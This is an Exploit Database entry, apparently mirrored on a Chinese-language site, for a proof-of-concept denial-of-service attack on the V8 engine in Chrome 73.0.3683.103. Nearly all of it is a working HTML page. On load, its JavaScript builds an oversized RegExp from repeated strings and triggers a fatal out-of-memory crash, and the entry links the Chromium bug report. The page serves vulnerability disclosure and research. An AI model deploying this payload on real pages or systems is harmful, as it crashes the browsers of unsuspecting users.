Google Chrome 73.0.3683.103 V8 JavaScript Engine – Out-of-Memory in Invalid Table Size Denial of Service (PoC)

• Exploit Database
• 19 阅读

• 作者： Bogdan Kurinnoy
  日期： 2019-04-22
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/46735/

• <!--
  # Exploit Title: Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-memory in invalid table size . Denial of Service (PoC)
  # Google Dork: N/A
  # Date: 2019-04-20
  # Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
  # Vendor Homepage: https://www.google.com/
  # Version: Google Chrome 73.0.3683.103
  # Tested on: Windows x64
  # CVE : N/A
  
  # Description:
  
  # Fatal javascript OOM in invalid table size 
  
  # https://bugs.chromium.org/p/chromium/issues/detail?id=918301
  -->
  
  
  <html>
  <head>
  <script>
  
  var arr1 = [0,1];
  
  function ObjCreate(make) {
  this.make = make;
  }
  
  var obj1 = new ObjCreate();
  
  function main() {
  
  	arr1.reduce(f3); 
  
  	Object.getOwnPropertyDescriptors(Array(99).join(obj1.make));
  
  }
  
  function f3() {
  
  	obj1["make"] = RegExp(Array(60000).join("CCC")); 
  }
  
  </script>
  </head>
  <body onload=main()></body>
  </html>